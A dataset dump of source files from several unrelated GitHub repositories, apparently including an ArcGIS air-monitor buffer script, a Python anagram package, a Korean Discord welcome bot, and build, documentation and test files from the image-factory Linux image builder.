argumentList3[0][4])\n readyToJoin=True\n if(readyToJoin):\n for argument in argumentList: # for each variable that was used to calculate an average values, add the value to the air monitor partition shp file\n # print(\"hot dog\") for debugging purposes only\n BufferVariables.addVariableToPartition(argument, airMonitor,values.RASTER_TYPE)\n for argument in argumentList2:\n BufferVariables.addVariableToPartition(argument, airMonitor,values.POLYLINE_TYPE)\n for argument in argumentList3:\n BufferVariables.addVariableToPartition(argument, airMonitor,values.POINT_BUFFER_TYPE)\n else:\n raise Exception\n #print(\"sucessfully added buffer variables\")\n except Exception as e:\n print(\"couldn't process variables, loop will cycle again\" + str(e))\n pool.terminate()\n continue\n finally:\n if(variableType == values.RASTER_TYPE) or(variableType == values.PARALLEL_PROCESSING):\n try:\n pool.terminate()\n except:\n print(\"could not terminate pool\")\n try:\n dirList = os.listdir(values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE)\n for dirFolder in dirList:\n path = values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE + \"/\" + dirFolder\n dirList2 = os.listdir(path)\n for dirFolder2 in dirList2:\n path2 = path + \"/\" + dirFolder2\n dirList3 = os.listdir(path2)\n for dirFolder3 in dirList3:\n path3 = path2 + \"/\" + dirFolder3\n try:\n shutil.rmtree(path3) \n except:\n #print(\"couldn't remove filepath \" + path3)\n exceptTemp = 1\n try:\n fileList = os.listdir(path3)\n print(fileList)\n for filename in fileList:\n try:\n os.remove(path2 +\"/\" + filename)\n except:\n # print(\"warning: could not delete the temp stats file \" + filename )\n exceptTemp = 1\n except:\n excpetTemp = 1 \n #print(\"warning: could not delete the temp stats files\") \n except:\n # print(\"couldn't delete the list directories\") \n exceptTemp = 1\n break\n print(\"finished calculating \" + 
str(variableType) + \" type values for buffer \" + str(buffer) + \" of air monitor partition \" + identifier) \n try:\n del pool, argVars, argumentList, fileList\n except:\n print(\"couldn't delete pool\")\n \n### end of processBufferVariables \n \n \n########## end of helper functions ###############\n \n \n \n \n \n############ main function ##################\ndef main():\n print(\"running main\")\n if not os.path.exists(values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE): os.makedirs(values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE)\n #BufferVariables.runPointAnalysis() # get point values \n zonesDefined = BufferVariables.assignZones()\n if not os.path.exists(constantValues.RESULTS_FOLDER + constantValues.TEMP_STATS_WORKSPACE): os.makedirs(constantValues.RESULTS_FOLDER + constantValues.TEMP_STATS_WORKSPACE) \n print(\"defined buffer zones\")\n airMonitorPartitions = BufferVariables.partitionShapefile(zonesDefined) # partition air monitor stations\n print(\"defined air monitor partitions\")\n airMonitorPartitions = airMonitorPartitions[0:len(airMonitorPartitions)]\n makeBufferZones(airMonitorPartitions) # make buffer zones for each partition\n i=0\n for airMonitor in airMonitorPartitions: # for each air monitor partition\n startTime = time.time()\n if(i>=0):\n rasterList = []\n polyLineList = []\n pointList = []\n pointBufferList = []\n determineRasterList(airMonitor,rasterList)\n determinePolylineList(airMonitor, polyLineList)\n determinePointList(airMonitor, pointList)\n determinePointBufferList(airMonitor, pointBufferList)\n print(pointList)\n #BufferVariables.runPointAnalysis(airMonitor, pointList)\n identifier = BufferVariables.determineAirMonitorIdentifier(airMonitor) # determine the partition number\n partitionFolderOut = values.RESULTS_FOLDER + values.KEYWORD + identifier + \"/\" \n for buffer in values.BUFFER_DISTANCE: # for each buffer radius \n bufferFilename = \"buffer\" + str(buffer) + \"m.shp\" \n masterBufferFile = values.RESULTS_FOLDER + values.KEYWORD + identifier + values.BUFFER_EXTENSION + bufferFilename \n maxThreads = 1 #multiprocessing.cpu_count()*2 -2\n if(1 > 5):#maxThreads >= len(rasterList) + len(polyLineList)):\n print(\"running polyline and raster buffer variables in parallel\")\n parallelList = [rasterList,polyLineList]\n processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor, values.PARALLEL_PROCESSING, parallelList)\n processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor, values.POINT_BUFFER_TYPE, pointBufferList)\n else:\n processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor,values.RASTER_TYPE, rasterList) # get average raster values\n #processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor,values.POLYLINE_TYPE,polyLineList) # get average polyline values\n #processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor,values.POINT_BUFFER_TYPE,pointBufferList) # get average point values\n print (\"completed buffer distance \" + str(buffer) + \" for air Monitor partition \" + str(identifier))\n #print(\"completed gathering buffer values for air monitoring station partition \" + str(identifier))\n print(\"time required to process partition \" + str(identifier) + \": \" + str(time.time()-startTime))\n i+=1\n print(\"completed gathering buffer values for all air monitoring station partitions\")\n arcpy.Merge_management(inputs=airMonitorPartitions,output=values.RESULTS_FOLDER + 
\"final.shp\",field_mappings=\"#\") \n #arcpy.ExportXYv_stats\n print (\"completed running the main script\")\n\n### end of main function ###\n \n\n# run the main function\nif __name__ == '__main__':\n main()\n \n \n########## end of runScripts.py ###############" } ]
6
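Editorial note on the record above: ModelSelection.R fits NO2 land-use-regression models with R's lm() over predictors computed at several buffer radii (for example aL2000m, te_14_16, sat_10_12). The sketch below reproduces just that ordinary-least-squares step in Python on synthetic placeholder data; every value in it is illustrative and not taken from the study.

```python
# Minimal, self-contained sketch (not part of the repository above) of the
# kind of OLS fit the R script performs with lm(); the design-matrix columns
# stand in for predictors such as aL2000m, te_14_16 and sat_10_12.
import numpy as np

rng = np.random.default_rng(0)
n_monitors, n_predictors = 100, 4
X = rng.normal(size=(n_monitors, n_predictors))   # buffer/meteorology predictors
beta_true = np.array([2.0, -1.0, 0.5, 0.0])
no2_vals = X @ beta_true + rng.normal(scale=0.1, size=n_monitors)

# Add an intercept column and solve the least-squares problem, the same
# estimation step as lm(NO2_vals ~ ..., data = exactMatrix) in R.
X1 = np.column_stack([np.ones(n_monitors), X])
coef, *_ = np.linalg.lstsq(X1, no2_vals, rcond=None)
print("intercept and slopes:", coef)
```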
MichaelQuant4R/holistic-anagram2
https://github.com/MichaelQuant4R/holistic-anagram2
3c00e702cfe42e839a6491b1b8c37595be83633e
913e1185d50a64a9f9ba39d82d437d47dcba2c79
d2891a643dd904bc0f6ee40d4a668ba264529772
refs/heads/main
2023-07-27T09:51:34.440286
2021-09-10T13:16:51
2021-09-10T13:16:51
405105655
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.43466460704803467, "alphanum_fraction": 0.4369910955429077, "avg_line_length": 21, "blob_id": "d45f4414ba18279a5c7d64f79a68711de9b7f1d2", "content_id": "ae7a90cb79acf49cd2f1134ba4a94b848e2c4a64", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2579, "license_type": "permissive", "max_line_length": 63, "num_lines": 117, "path": "/build/lib/holistic_anagram/holistic_anagram.py", "repo_name": "MichaelQuant4R/holistic-anagram2", "src_encoding": "UTF-8", "text": "import os\nfrom .english_heroku import heroku_words\n\nclass Anagram(object):\n \n __author__ = 'Michael S. Russell'\n __email__ = '[email protected]'\n __version__ = '1.0.12'\n \n def __init__(self):\n \n self.words = None\n self.real_words = []\n self.res = {}\n self.sentence = \"\"\n self.json = {\"anagram\": [], \"non-anagram\": []}\n self.path = os.getcwd()\n \n def init_app(self, heroku=False):\n \n if heroku:\n \n self.words = heroku_words.split(\" \")\n \n else:\n \n with open(self.path + \"\\\\english.txt\", \"r\") as r:\n words = r.read().replace(\"\\n\", \",\").split(\",\")\n\n self.words = words\n \n \n def enter_words_print(self):\n \n self.sentence = input(\"Enter words for anagram algo: \")\n\n mylist = self.sentence.split(\" \")\n \n mylist = list(set(mylist))\n\n for word in mylist:\n\n if word in self.words:\n\n self.real_words.append(word)\n\n for word in self.real_words:\n\n self.res[tuple(sorted(word))] = []\n\n for key in self.res:\n\n for word in self.real_words:\n\n if tuple(sorted(word)) == key:\n\n self.res[key].append(word)\n \n for w in list(self.res.values()):\n\n if len(w) >= 2:\n print(\"Anagram :\", w)\n\n else:\n\n print(\"Not an anagram :\", w)\n print()\n \n self.real_words = []\n self.res = {}\n self.sentence = \"\"\n\n \n def enter_words_json(self, sentence):\n \n self.sentence = sentence\n\n mylist = self.sentence.split(\" \")\n \n mylist = list(set(mylist))\n\n for word in mylist:\n\n if word in self.words:\n\n self.real_words.append(word)\n\n for word in self.real_words:\n\n self.res[tuple(sorted(word))] = []\n\n for key in self.res:\n\n for word in self.real_words:\n\n if tuple(sorted(word)) == key:\n\n self.res[key].append(word)\n \n \n for w in list(self.res.values()):\n\n if len(w) >= 2:\n \n self.json[\"anagram\"].append(w)\n\n else:\n\n self.json[\"non-anagram\"].append(w)\n \n data = self.json\n self.real_words = []\n self.res = {}\n self.sentence = \"\"\n self.json = {\"anagram\": [], \"non-anagram\": []}\n \n return data\n \n" }, { "alpha_fraction": 0.5274102091789246, "alphanum_fraction": 0.539697527885437, "avg_line_length": 26.05714225769043, "blob_id": "cb999c1f7d4d7a6a8326093977114918b4a491a0", "content_id": "db41a30e1fcd65beb1d58a46407074a37e4b4740", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1058, "license_type": "permissive", "max_line_length": 61, "num_lines": 35, "path": "/setup.py", "repo_name": "MichaelQuant4R/holistic-anagram2", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\ndef readme():\n \n with open(\"README.md\") as f:\n README = f.read()\n \n return README\n\n\nsetup(\n \n name = \"holistic-anagram\",\n version=\"1.0.12\",\n description = \"A python package for anagrams\",\n long_description=readme(),\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/MichaelQuant4R/holistic-anagram\",\n author=\"Michael S. 
Russell\",\n author_email=\"[email protected]\",\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3.0\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\"\n ],\n package_data = {\"holistic_anagram\":[\"english.txt\"]},\n packages = [\"holistic_anagram\"],\n package_dir ={\"holistic_anagram\":\"holistic_anagram\"},\n include_package_data = True,\n install_requires=[]\n\n)\n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n" }, { "alpha_fraction": 0.7373887300491333, "alphanum_fraction": 0.7448071241378784, "avg_line_length": 30.325580596923828, "blob_id": "af091a4f45fea5fe21d609557c18ba6ec8bb61d4", "content_id": "a5c608dbbc52b53155612a5ce09e8b42f81139f1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1348, "license_type": "permissive", "max_line_length": 134, "num_lines": 43, "path": "/README.MD", "repo_name": "MichaelQuant4R/holistic-anagram2", "src_encoding": "UTF-8", "text": "# ANAGRAM READ ME \n\nThere are several methods that can be used in the holistic_anagram.py file. These include:\n\n- init_app\n- enter_words_print\n- enter_words_json\n\n\n### Install\n\n**Note: python-anagram requires python3**\n\n```shell\npip install holistic-anagram\n```\n\n### Website using python-anagram\n- [anagram website example](https://holistic-anagram.herokuapp.com)\n\n\n### Steps on how to use python-anagram package\n1. Create an instance of your anagram. Example: anagram = Anagram()\n2. Initialize your instance. anagram.init_app(). This allows the app to check if a word is real or not.\n3. You can then enter words using `enter_words_print` method or\n`enter_words_json`. The former is as an interactive script using the input function.\nThe later requires the sentence argument, and generates json data to be used in a web application e.g. in FastAPI, Flask, Django, etc.\n\n### Example of use\n- Type in `bats tabs tekken attack on titan no rats tsar star tops tops spot stop psto psto pots`\n- This will remove the non-English words, remove duplicates and leave you with:\n`bats tabs attack on titan no rats tsar star tops spot stop`\n- It then checks if any of the words are anagrams of each other.\n- Output is either a print statement or returns json formatted data.\n\n\n### Dependencies\n- No dependencies\n\n### Python versions\n - 3.7.x\n - 3.8.x\n - 3.9.x\n\n" } ]
3
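Editorial note on the record above: holistic_anagram.py detects anagrams by keying each word on the tuple of its sorted letters, so words sharing a key are anagrams of each other. The standard-library sketch below shows that core grouping step in isolation; the sample word list is illustrative.

```python
# Minimal sketch of the sorted-letters grouping used in holistic_anagram.py:
# words that share the same sorted tuple of characters are anagrams.
from collections import defaultdict

def group_anagrams(words):
    groups = defaultdict(list)
    for word in set(words):          # drop duplicates, as the package does
        groups[tuple(sorted(word))].append(word)
    # Groups with two or more members are anagram sets.
    return {"anagram": [g for g in groups.values() if len(g) >= 2],
            "non-anagram": [g for g in groups.values() if len(g) < 2]}

print(group_anagrams("bats tabs rats tsar star stop tops spot pots on no".split()))
```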
wake3532/hello
https://github.com/wake3532/hello
7f7c43f8920edf0d8ba4d73d609c3c6ff5476e9b
c4627ed9a85d53ff7e933783b8d907cbb5b5c15b
35238e4ac82c75138bad24eaa12beaec746bc61e
refs/heads/main
2023-01-30T20:47:11.611054
2020-12-08T04:50:14
2020-12-08T04:50:14
319528444
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6140519976615906, "alphanum_fraction": 0.621270477771759, "avg_line_length": 29.484848022460938, "blob_id": "11a3587c97936e4a2ea147b7abb0438fe60ff304", "content_id": "125564c7036e005ee5e16c590975fc627163210a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2378, "license_type": "no_license", "max_line_length": 150, "num_lines": 66, "path": "/auzrabot.py", "repo_name": "wake3532/hello", "src_encoding": "UTF-8", "text": "import discord\r\nfrom discord.ext import commands\r\nimport os\r\nimport asyncio\r\nimport random\r\nimport urllib\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.request import Request\r\nfrom urllib import parse\r\nimport bs4\r\nimport time\r\n\r\n\r\nclient = discord.Client()\r\n\r\[email protected]\r\nasync def on_ready():\r\n print('봇이 로그인 하였습니다.')\r\n print(' ')\r\n print('닉네임 : {}'.format(client.user.name))\r\n print('아이디 : {}'.format(client.user.id))\r\n\r\[email protected]\r\nasync def on_ready():\r\n print('봇이 로그인 하였습니다.')\r\n print(' ')\r\n print('닉네임 : {}'.format(client.user.name))\r\n print('아이디 : {}'.format(client.user.id))\r\n while True:\r\n user = len(client.users)\r\n server = len(client.guilds)\r\n messages = [\"모든 비트코인 구매 : 센트럴젠비코자판기.kro.kr \", \"모두들 환영합니다 구매는 : 센트럴젠비코자판기.kro.kr \" , \"코로나 의심시 1339 \" , \"코로나 2.5단계 의심시 전화를 해야합니다 😨\"]\r\n for (m) in range(5):\r\n await client.change_presence(status=discord.Status.dnd, activity=discord.Activity(name=messages[(m)], type=discord.ActivityType.watching))\r\n await asyncio.sleep(4)\r\n\r\n\r\[email protected]\r\nasync def on_member_join(member):\r\n syschannel = member.guild.system_channel.id \r\n try:\r\n embed=discord.Embed(\r\n title=f'모두들 환영해주세요 🎃',\r\n description=f'{member}님 환영해요. 메리크리스마스 ! \\n현재 서버 인원수: {str(len(member.guild.members))}명',\r\n colour=0x00ff00\r\n )\r\n embed.set_thumbnail(url=member.avatar_url)\r\n await client.get_channel(syschannel).send(embed=embed)\r\n except:\r\n return None\r\[email protected]\r\nasync def on_member_remove(member):\r\n syschannel = member.guild.system_channel.id \r\n try:\r\n embed=discord.Embed(\r\n title=f'왜 나가요 😭',\r\n description=f'{member}님이 센트럴젠을 나갔습니다 😭 \\n현재 서버 인원수: {str(len(member.guild.members))}명',\r\n colour=discord.Colour.red()\r\n )\r\n embed.set_thumbnail(url=member.avatar_url)\r\n await client.get_channel(syschannel).send(embed=embed)\r\n except:\r\n return None\r\n \r\naccess_token = os.environ[\"BOT_TOKEN\"]\r\nclient.run(access_token)\r\n" } ]
1
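Editorial note on auzrabot.py above: `on_ready` is registered twice with `@client.event`, and discord.py keeps only the last registration, so the first (log-only) handler is dead code. Below is a hedged sketch of a single merged handler, not a drop-in patch; the status texts are placeholders, and the no-intents `discord.Client()` call simply mirrors the file's discord.py 1.x style.

```python
# Hedged sketch: one on_ready handler that both logs the login and rotates
# the presence, replacing the duplicate pair in auzrabot.py. Assumes
# discord.py 1.x, where discord.Client() needs no intents argument.
import asyncio
import discord

client = discord.Client()

@client.event
async def on_ready():
    print("logged in as", client.user.name, client.user.id)
    messages = ["status one", "status two"]  # placeholder presence texts
    while True:
        for text in messages:
            await client.change_presence(
                status=discord.Status.dnd,
                activity=discord.Activity(name=text,
                                          type=discord.ActivityType.watching),
            )
            await asyncio.sleep(4)
```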
ionos-enterprise/image-factory
https://github.com/ionos-enterprise/image-factory
737ba4d563e2bbec13d19976890bc6cce353d7ce
95626367c5fad4a66dca321e050b6c68529e24f0
f463c2676158d4df6c61c305233555ba66c34fe6
refs/heads/master
2023-08-28T12:05:35.054167
2022-05-04T08:06:55
2022-05-04T08:06:55
286790954
7
0
null
null
null
null
null
[ { "alpha_fraction": 0.6898339986801147, "alphanum_fraction": 0.6950207352638245, "avg_line_length": 41.844444274902344, "blob_id": "03624e656159fb1c2ccff2227f637e47d69f9e91", "content_id": "a4a5156d9f772e8d357ea8d74c718ecee8f195c2", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1928, "license_type": "permissive", "max_line_length": 88, "num_lines": 45, "path": "/tests/test_black.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2021, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Run black code formatter in check mode.\"\"\"\n\nimport subprocess\nimport sys\nimport unittest\n\nfrom . import get_source_files, unittest_verbosity\n\n\nclass BlackTestCase(unittest.TestCase):\n \"\"\"\n This unittest class provides a test that runs the black code\n formatter in check mode on the Python source code. The list of\n source files is provided by the get_source_files() function.\n \"\"\"\n\n def test_black(self):\n \"\"\"Test: Run black code formatter on Python source code.\"\"\"\n\n cmd = [\"black\", \"--check\", \"--diff\", \"-l\", \"99\"] + get_source_files()\n if unittest_verbosity() >= 2:\n sys.stderr.write(f\"Running following command:\\n{' '.join(cmd)}\\n\")\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True\n ) as process:\n output = process.communicate()[0].decode()\n\n if process.returncode == 1: # pragma: no cover\n self.fail(f\"black found code that needs reformatting:\\n{output.strip()}\")\n if process.returncode != 0: # pragma: no cover\n self.fail(f\"black exited with code {process.returncode}:\\n{output.strip()}\")\n" }, { "alpha_fraction": 0.6806108951568604, "alphanum_fraction": 0.7051792740821838, "avg_line_length": 34.02325439453125, "blob_id": "8967c9092e9b1de0f5b6dbbf702d55545bd28fbd", "content_id": "165d45ae13eec0bbabed518fc8ba17d5247b8ad0", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1506, "license_type": "permissive", "max_line_length": 109, "num_lines": 43, "path": "/Makefile", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "PREFIX ?= /usr/local\n\nVERSION := 1.0.2\nDIST := image-factory image-factory.1.md image-factory.conf image_factory.py \\\n\timage-factory-sudo-helper image-factory-sudo-helper.1.md LICENSE Makefile NEWS.md README.md \\\n\ttests/__init__.py tests/pylint.conf tests/test_black.py tests/test_cli.py tests/test_flake8.py \\\n\ttests/test_helper.py tests/test_isort.py tests/test_pylint.py tests/test_sudo_helper.py \\\n\t$(wildcard data/*.cfg) $(wildcard data/*.xml)\n\nall: doc\n\ncheck:\n\tpython3 -m unittest discover -v\n\nclean:\n\trm -f *.1\n\ndist: 
image-factory-$(VERSION).tar.xz image-factory-$(VERSION).tar.xz.asc\n\nversion:\n\t@echo $(VERSION)\n\n%.asc: %\n\tgpg --armor --batch --detach-sign --yes --output $@ $^\n\n%.tar.xz: $(DIST)\n\ttar -c --exclude-vcs --transform=\"s@^@$*/@S\" $^ | xz -cz9 > $@\n\ndoc: image-factory.1 image-factory-sudo-helper.1\n\n%.1: %.1.md\n\tpandoc -s -t man $^ -o $@\n\ninstall:\n\tinstall -D -m 755 image-factory $(DESTDIR)$(PREFIX)/bin/image-factory\n\tinstall -D -m 755 image-factory-sudo-helper $(DESTDIR)$(PREFIX)/bin/image-factory-sudo-helper\n\tinstall -D -m 644 image-factory.1 $(DESTDIR)$(PREFIX)/share/man/man1/image-factory.1\n\tinstall -D -m 644 image-factory-sudo-helper.1 $(DESTDIR)$(PREFIX)/share/man/man1/image-factory-sudo-helper.1\n\tinstall -d $(DESTDIR)$(PREFIX)/share/image-factory\n\tinstall -m 644 $(wildcard data/*) $(DESTDIR)$(PREFIX)/share/image-factory\n\tinstall -D -m 644 image-factory.conf $(DESTDIR)$(PREFIX)/share/doc/image-factory/image-factory.conf\n\n.PHONY: all check clean doc install version\n" }, { "alpha_fraction": 0.694261372089386, "alphanum_fraction": 0.6984407901763916, "avg_line_length": 28.76555061340332, "blob_id": "c75c7e7350a7286e0c591b7842965102ef8b3961", "content_id": "edc339b7922752c879289d9d412f87e201012540", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6221, "license_type": "permissive", "max_line_length": 79, "num_lines": 209, "path": "/image-factory.1.md", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "---\ndate: 2020-08-05\nfooter: image-factory\nheader: \"image-factory's Manual\"\nlayout: page\nlicense: 'Licensed under the ISC license'\nsection: 1\ntitle: IMAGE-FACTORY\n---\n\n# NAME\n\nimage-factory - build golden Linux images\n\n# SYNOPSIS\n\n**image-factory** [**-h**|**\\--help**] [**-c**|**\\--cache-dir** *CACHE_DIR*]\n[**-f**|**\\--format** {*qcow2*,*raw*}] [**\\--image-size** *IMAGE_SIZE*]\n[**\\--mac** *MAC*] [**\\--installer-logs**] [**\\--no-installer-logs**]\n[**\\--log-file**] [**\\--no-log-file**] [**\\--log-filename** *LOG_FILENAME*]\n*image*\n\n# DESCRIPTION\n\n**image-factory** is a command line tool for building golden Linux images. It\nuses **virt-install** to do installations via the network. The installation and\nconfiguration of the images is done using the netinstall support from the\ndistributions, i.e.\n\n* preseed for Debian/Ubuntu\n* Kickstart for CentOS/Fedora\n* AutoYaST for openSUSE\n\n**image-factory** is used by IONOS Cloud to build the golden public Linux\nimages for their Enterprise Cloud. The configuration files are shipped with\nthis project to allow anyone to rebuild their images.\n\n**image-factory** runs following steps:\n\n* Create a virtual RAW image using qemu-img.\n\n* Cache **linux** kernel and **initrd**.\n\n* Run installation using **virt-install**. 
*qemu:///session* is used as session\nfor normal users and *qemu:///system* when run as root.\n\n* The installation partition is mounted and the installer logs are removed.\n\n* **zerofree** is run on the partition.\n\n* If **format** is set to *qcow2*, the virtual raw images will be converted\nto qcow2 using **qemu-img**.\n\n* The SHA 256 sum is calculated for the image.\n\n* The image will be uploaded to all locations configured in\n**upload_destinations**.\n\n* If **post-build-command** is configured, the specified command will be\nexecuted.\n\n# OPTIONS\n\n**-h**, **\\--help**\n: Show a help message and exit\n\n**-c** *CACHE_DIR*, **\\--cache-dir** *CACHE_DIR*\n: Cache directory (default: *~/.cache/image-factory* or\n*var/cache/image-factory* for root)\n\n**-f** {*qcow2*,*raw*}, **\\--format** {*qcow2*,*raw*}\n: Image format to use (default: *raw*)\n\n**\\--image-size** *IMAGE_SIZE*\n: Size of the raw image (default: *2G*)\n\n**\\--mac** *MAC*\n: MAC address used in the installation machine\n\n**\\--installer-logs**\n: Print installer logs into logging output\n\n**\\--no-installer-logs**\n: Do not print installer logs into logging output\n\n**\\--log-file**\n: Store logs into a file (in addition to stdout/stderr)\n\n**\\--no-log-file**\n: Do not store logs into a file (in addition to stdout/stderr)\n\n**\\--log-filename** *LOG_FILENAME*\n: log into specified file\n\n*image*\n: Image to build. The date in form of *YYYY-MM-DD* and the file format\nsuffix will be added to the generated image filename.\n\n# CONFIGURATION\n\nEach image needs to be also configured in */etc/image-factory.conf* or\n*~/.config/image-factory.conf*. These configuration files use the INI\nfile format. The image name will be used as section and following keys are\nused:\n\n**append**\n: Extra kernel parameter for the netboot image to use\n\n**cache_dir**\n: Cache directory (default: *~/.cache/image-factory* or\n*var/cache/image-factory* for root). Can be overridden by **\\--cache-dir**.\n\n**cores**\n: Number of CPU cores to use during installation. Default: *1*\n\n**format**\n: Image format to use. Can be *qcow2* or *raw* (default). Can be overridden\nby **\\--format**.\n\n**image-size**\n: Size of the raw image (default: *2G*). Can be overridden by\n**\\--image-size**.\n\n**initrd**\n: URI of the netboot installer initrd. Supported schemes are *file:*,\n*http:*, *https:*, and *rsync:*. Unless using *file:*, the specified initrd\nwill be cached locally.\n\n**installer-logs**\n: Boolean whether to print installer logs into logging output. Can be\noverridden by **\\--installer-logs** or **\\--no-installer-logs**.\n\n**keep-raw**\n: Boolean whether to keep raw image (in case format is not raw). Default is\n*False*.\n\n**kickstart**\n: Filename of the Kickstart file. Needed when using Kickstart on\nCentOS/Fedora.\n\n**linux**\n: URI of the netboot installer Linux kernel. Supported schemes are *file:*,\n*http:*, *https:*, and *rsync:*. Unless using *file:*, the specified kernel\nwill be cached locally.\n\n**log-file**\n: Boolean whether to store logs into a file (in addition to stdout/stderr).\nCan be overridden by **\\--log-file** or **\\--no-log-file**.\n\n**log-filename**\n: Filename to log into (if enabled). Can be overridden by\n**\\--log-filename**.\n\n**mac**\n: MAC address used in the installation machine. Can be overridden by\n**\\--mac**.\n\n**post-build-command**\n: Optional command to run after the image was successfully built. 
The name\nof the image will be passed as first argument.\n\n**preseed**\n: Filename of the preseed file. Needed when using preseed on Debian/Ubuntu.\n\n**ram**\n: Memory for virtual machine to use during installation.\n\n**upload_destinations**\n: Comma-separated list of upload destinations. Each upload destination\nneeds a section in the configuration file (see UPLOAD DESTINATION CONFIGURATION\nbelow). To disable the upload, let **upload_destinations** undefined or set to\nan empty string.\n\n**vnc**\n: VNC port for the installation virtual machine. It is recommended to bind\nthe VNC port to localhost only.\n\n**yast**\n: Filename of the AutoYaST file. Needed when using AutoYaST on openSUSE.\n\n# UPLOAD DESTINATION CONFIGURATION\n\nEach upload destination configured in **upload_destinations** needs a section\nin the INI configuration, where at least **upload_type** and **upload_target**\nare set. Following keys are accepted:\n\n**post-upload-command**\n: Additional command to run after a successful upload. *${image}* can be\nused as parameter in post-upload-command. If multiple commands are needed,\nsuffix the key with a number (counting up from 1), e.g.\n**post-upload-command1**.\n\n**upload_args**\n: Additional arguments for the upload command to use, e.g. *\\--progress*\nfor uploads with rsync.\n\n**upload_target**\n: Upload target in the format the upload type supports it.\n\n**upload_type**\n: Type of upload. Currently only *rsync* is supported.\n\n# SEE ALSO\n\nqemu-img(1), virt-install(1), zerofree(8)\n\n# AUTHOR\n\nBenjamin Drung <[email protected]>\n" }, { "alpha_fraction": 0.6317080855369568, "alphanum_fraction": 0.6430543065071106, "avg_line_length": 39.25925827026367, "blob_id": "4d80119e2c61fbe7f5a1f81633342d9ca64e1238", "content_id": "ece5333fa627ac4068932b2b996573587a2cbc55", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3261, "license_type": "permissive", "max_line_length": 94, "num_lines": 81, "path": "/tests/test_sudo_helper.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2019, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Test image-factory-sudo-helper script.\"\"\"\n\nimport os\nimport subprocess\nimport unittest\n\n\nclass TestSudoHelper(unittest.TestCase):\n \"\"\"\n This unittest class tests the image-factory-sudo-helper script.\n \"\"\"\n\n SCRIPT = os.path.join(os.path.dirname(__file__), \"..\", \"image-factory-sudo-helper\")\n\n def call_helper(self, cmd, silence=False):\n \"\"\"Call the image-factory-sudo-helper script in dryrun mode.\"\"\"\n return subprocess.call(\n [self.SCRIPT] + cmd,\n stdout=subprocess.DEVNULL,\n env={\"DRYRUN\": \"1\"},\n stderr=subprocess.DEVNULL if silence else None,\n )\n\n def test_mount(self):\n \"\"\"Test mounting.\"\"\"\n cmd = [\"mount\", \"/dev/loop0\", \"/tmp/image-factory._3gm0lem\"]\n self.assertEqual(self.call_helper(cmd), 0)\n\n def test_chmod_root(self):\n \"\"\"Test chmod mounted /root\"\"\"\n cmd = [\"chmod\", 